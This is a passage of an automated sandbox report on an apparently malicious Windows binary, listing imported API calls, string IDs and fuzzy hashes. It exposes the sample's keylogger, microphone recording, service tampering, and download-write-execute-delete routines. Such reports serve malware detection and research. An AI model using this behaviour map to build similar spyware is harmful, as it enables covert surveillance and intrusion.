                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004026BF
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004026C8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@D@1@@D@2@@0@Hstd@@LocalTimeV10@V?$basic_string@printf
                                                • String ID: %02i:%02i:%02i:%03i [KeepAlive] $Disabled.
                                                • API String ID: 1710008465-2552289483
                                                • Opcode ID: 11e19690029befe59de54d6ba24a75445ff929cbabed44acba4ab1026dfebb04
                                                • Instruction ID: eb3b56c90bd2445efaa9b045d76b4011f5b573c2245cd0345198108cbb194c44
                                                • Opcode Fuzzy Hash: 11e19690029befe59de54d6ba24a75445ff929cbabed44acba4ab1026dfebb04
                                                • Instruction Fuzzy Hash: 03115276800258BBCF11EFE0DC498FE7BBCBA15702B0444A7F942E21D1EA799684C768
                                                APIs
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 0040181E
                                                • CreateDirectoryW.KERNEL32(00000000), ref: 00401825
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000024), ref: 00401873
                                                • atoi.MSVCRT(00000000), ref: 0040187A
                                                • waveInOpen.WINMM(004191F0,000000FF,004191F8,0040193B,00000000), ref: 004018BD
                                                • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60 ref: 004018D0
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 004018D8
                                                • waveInPrepareHeader.WINMM(00419180,00000020), ref: 00401913
                                                • waveInAddBuffer.WINMM(00419180,00000020), ref: 00401922
                                                • waveInStart.WINMM ref: 0040192E
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: U?$char_traits@V?$allocator@wave$?c_str@?$basic_string@D@2@@std@@D@std@@$?resize@?$basic_string@BufferCreateDirectoryG@2@@std@@G@std@@HeaderOpenPrepareStartatoi
                                                • String ID:
                                                • API String ID: 1097200658-0
                                                • Opcode ID: 8390b6e67e54b26922ff1895692ba30a82f639e627a6407e701ab642968fd862
                                                • Instruction ID: b734a3c13cd202d9701ed3e4bc3115da9fc503d9af51fa648038ac1b2232bf5a
                                                • Opcode Fuzzy Hash: 8390b6e67e54b26922ff1895692ba30a82f639e627a6407e701ab642968fd862
                                                • Instruction Fuzzy Hash: 38213670640202BBE7009F25EC6DAD97AB5FB84B16700C1BAE912962B0D7B94CC4DB4D
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040ED34
                                                • SetEvent.KERNEL32(?), ref: 0040ED3D
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040ED46
                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6C995E04), ref: 0040ED5E
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00419288), ref: 0040ED6E
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040ED7D
                                                  • Part of subcall function 00411550: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 0041155F
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411576
                                                  • Part of subcall function 00411550: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C), ref: 0041158C
                                                  • Part of subcall function 00411550: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 004115AA
                                                  • Part of subcall function 00411550: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115B4
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115BD
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115D2
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115DF
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411631
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 0041163A
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411643
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040EDA4
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040EDBA
                                                  • Part of subcall function 0040EB85: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413764,?,?), ref: 0040EBA0
                                                  • Part of subcall function 0040EB85: getenv.MSVCRT ref: 0040EBAC
                                                  • Part of subcall function 0040EB85: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000), ref: 0040EBB8
                                                  • Part of subcall function 0040EB85: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040EBC5
                                                  • Part of subcall function 0040EB85: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040EBD0
                                                  • Part of subcall function 0040EB85: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040EBD9
                                                  • Part of subcall function 0040EB85: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000001), ref: 0040EBE6
                                                  • Part of subcall function 0040EB85: ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 0040EBF3
                                                  • Part of subcall function 0040EB85: ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 0040EBFF
                                                  • Part of subcall function 0040EB85: ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,?), ref: 0040EC18
                                                  • Part of subcall function 0040EB85: ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040EC25
                                                  • Part of subcall function 0040EB85: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040EC44
                                                  • Part of subcall function 0040EB85: ShellExecuteExA.SHELL32(0000003C), ref: 0040EC61
                                                  • Part of subcall function 0040EB85: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413670,?), ref: 0040EC85
                                                  • Part of subcall function 0040EB85: WaitForSingleObject.KERNEL32(?,000000FF,00000070), ref: 0040EC99
                                                  • Part of subcall function 0040EB85: CloseHandle.KERNEL32(?), ref: 0040ECA2
                                                  • Part of subcall function 0040EB85: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040ECAB
                                                  • Part of subcall function 0040EB85: DeleteFileA.KERNEL32(00000000), ref: 0040ECB2
                                                  • Part of subcall function 0040EB85: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413670,?,?,?,?,?), ref: 0040ECCC
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040EDD3
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040EDDC
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Similarity
                                                • API ID: U?$char_traits@V?$allocator@$D@std@@$D@2@@std@@$??0?$basic_string@$??1?$basic_string@$V01@@$?c_str@?$basic_string@D@1@@$?length@?$basic_string@D@std@@@std@@V12@V?$basic_string@$?substr@?$basic_string@D@2@@0@Hstd@@$??0?$basic_ofstream@??4?$basic_string@??6std@@?close@?$basic_ofstream@?find@?$basic_string@?is_open@?$basic_ofstream@CloseD@2@@0@@D@std@@@0@DeleteEventExecuteFileHandleObjectShellSingleV01@V10@V10@0@V10@@V?$basic_ostream@Waitgetenv
                                                • String ID:
                                                • API String ID: 3444260106-0
                                                • Opcode ID: af8022c0208c5fc199fd166c3b32a6adca22861f41633e972df59aa8b664ab69
                                                • Instruction ID: d870172fe7cf7232c7a138a17731a4b402ab1d34a93826d7b75f455e3ca831e5
                                                • Opcode Fuzzy Hash: af8022c0208c5fc199fd166c3b32a6adca22861f41633e972df59aa8b664ab69
                                                • Instruction Fuzzy Hash: 8C21603591011AABCF04FFA5DC5A8EE7B78FF14706F0044A9F502B31B1EA34A605CB99
                                                APIs
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040D2B5
                                                • StrToIntA.SHLWAPI(00000000), ref: 0040D2BC
                                                  • Part of subcall function 004113E6: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00419970,00419BC8,00000000,00408808,)A,00000000,0000000B), ref: 004113F2
                                                  • Part of subcall function 004113E6: ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411400
                                                  • Part of subcall function 004113E6: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411422
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00411444
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411458
                                                  • Part of subcall function 004113E6: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411461
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000001), ref: 0040D2DF
                                                  • Part of subcall function 00408137: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00408147
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D2FA
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040D303
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040D31A
                                                  • Part of subcall function 004119EF: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000,75920F00,?,0040FC0A), ref: 004119FB
                                                  • Part of subcall function 004119EF: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040FC0A), ref: 00411A05
                                                  • Part of subcall function 004119EF: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00411A19
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040D32B
                                                  • Part of subcall function 00411F9F: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413984,?,00000001), ref: 00411FDC
                                                  • Part of subcall function 00411F9F: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413984,?), ref: 00412103
                                                  • Part of subcall function 00411F9F: SystemParametersInfoW.USER32(00000014,00000000,?,00000003), ref: 00412121
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,0041498C), ref: 0040D54E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@2@@std@@G@std@@$??0?$basic_string@??1?$basic_string@?c_str@?$basic_string@$D@1@@G@1@@V01@@$??2@?length@?$basic_string@?size@?$basic_string@InfoParametersSystem
                                                • String ID:
                                                • API String ID: 1124456442-0
                                                • Opcode ID: ca956ed552bc5e89b5c8d4b307b223353136c7186f37f99209fe00d10e94bc2d
                                                • Instruction ID: 20e6f7c3229ef9bcf61b370cf683929f5565303115c6d6bcbf10db3716f13a2e
                                                • Opcode Fuzzy Hash: ca956ed552bc5e89b5c8d4b307b223353136c7186f37f99209fe00d10e94bc2d
                                                • Instruction Fuzzy Hash: C811FC72A011149FCB04FBB1ED5AAED7738AF50306F1044BAF502E60E1EE789B48CB59
                                                APIs
                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00419288,?,?,?,?,?,?,?,004103C0), ref: 00410AC5
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(000F003F,?,?,?,?,?,?,?,004103C0), ref: 00410AD5
                                                • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,004103C0), ref: 00410ADD
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004103C0), ref: 00410AEA
                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,?,004103C0), ref: 00410AF9
                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00410B33
                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00410B36
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,004103C0), ref: 00410B3B
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ControlManager
                                                • String ID:
                                                • API String ID: 858787766-0
                                                • Opcode ID: 6343d739d5d65fe97308eff0db34dd302ca933c718c662b70b29980daa173324
                                                • Instruction ID: f2047ca2b0dd0ba7d94b639a82de2227e5b608de2b726cb7d0e94f747e52d90f
                                                • Opcode Fuzzy Hash: 6343d739d5d65fe97308eff0db34dd302ca933c718c662b70b29980daa173324
                                                • Instruction Fuzzy Hash: E801DB31540118BFC700AFB0DC89DFF7FBCEB1579AB004025F502D2154D7A49E86DAA5
                                                APIs
                                                • InternetOpenA.WININET(user,00000001,00000000,00000000,00000000), ref: 004110E1
                                                • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 004110F6
                                                • InternetReadFile.WININET(?,?,00002710,?), ref: 00411121
                                                • ??2@YAPAXI@Z.MSVCRT(?), ref: 00411136
                                                • ??2@YAPAXI@Z.MSVCRT(?), ref: 00411189
                                                • InternetCloseHandle.WININET(?), ref: 004111B7
                                                • InternetCloseHandle.WININET(?), ref: 004111BC
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Internet$??2@CloseHandleOpen$FileRead
                                                • String ID: user
                                                • API String ID: 2072504707-2375276105
                                                • Opcode ID: 3291619dc62e5185dd8b90ef4c4870ad2e3e002e25387920a7a5dcdb6759ae19
                                                • Instruction ID: 8756ad890ba4a00e0636b70f89312941d37efec6fcd4f5aa562b23cbdd28fdaa
                                                • Opcode Fuzzy Hash: 3291619dc62e5185dd8b90ef4c4870ad2e3e002e25387920a7a5dcdb6759ae19
                                                • Instruction Fuzzy Hash: 6A316932A00228AFCF25DF69DC45ADF7FA6FF09350B14806AF909D7250C674AA60CB94
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Online Keylogger Started,?), ref: 00404F3D
                                                  • Part of subcall function 0040512C: GetLocalTime.KERNEL32(?,00419830), ref: 0040513C
                                                  • Part of subcall function 0040512C: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,{ %04i/%02i/%02i %02i:%02i:%02i - ,?,! },?,?,?,?,?,6E@), ref: 00405172
                                                  • Part of subcall function 0040512C: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,6E@), ref: 0040517F
                                                  • Part of subcall function 0040512C: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,6E@), ref: 00405189
                                                  • Part of subcall function 0040512C: sprintf.MSVCRT ref: 00405197
                                                  • Part of subcall function 0040512C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004051A3
                                                  • Part of subcall function 0040512C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004051AC
                                                  • Part of subcall function 0040512C: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(?), ref: 004051C2
                                                  • Part of subcall function 0040512C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004051DF
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Online Keylogger Started,?), ref: 00404F54
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 00404F68
                                                  • Part of subcall function 00410CD2: GetLocalTime.KERNEL32(?), ref: 00410CE9
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00414BC4,?,00413760,?,?,_E@,?), ref: 00410D1E
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,_E@,?), ref: 00410D2B
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,_E@,?), ref: 00410D38
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,_E@,?), ref: 00410D45
                                                  • Part of subcall function 00410CD2: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,_E@,?), ref: 00410D4F
                                                  • Part of subcall function 00410CD2: printf.MSVCRT ref: 00410D56
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D62
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D6B
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D74
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D7D
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D86
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D8F
                                                • CreateThread.KERNEL32(00000000,00000000,Function_00004616,?,00000000,00000000), ref: 00404FAE
                                                  • Part of subcall function 004044C3: GetKeyboardLayout.USER32(00000000), ref: 004044C8
                                                • CreateThread.KERNEL32(00000000,00000000,Function_000045D8,?,00000000,00000000), ref: 00404F96
                                                • CreateThread.KERNEL32(00000000,00000000,Function_00004607,?,00000000,00000000), ref: 00404FA2
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@CreateD@1@@ThreadV10@$?c_str@?$basic_string@LocalTimeV10@@$KeyboardLayoutV01@V10@0@Y?$basic_string@printfsprintf
                                                • String ID: Online Keylogger Started$[INFO]
                                                • API String ID: 1215226480-3343292223
                                                • Opcode ID: 646a677352259ca406276490e7065b6d629f7c6d1b5630a2b1b27ee5224108d7
                                                • Instruction ID: 5f0151975c8510c7fda51e761d5d85a07a6f94a2710822030126be99bdef0cc3
                                                • Opcode Fuzzy Hash: 646a677352259ca406276490e7065b6d629f7c6d1b5630a2b1b27ee5224108d7
                                                • Instruction Fuzzy Hash: 1D11E5F06002483FE7217B698CC6DBF7EACDAC1799700447EF54162281DA7D5E4487B9
                                                APIs
                                                • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,0040375E,?,?), ref: 00411369
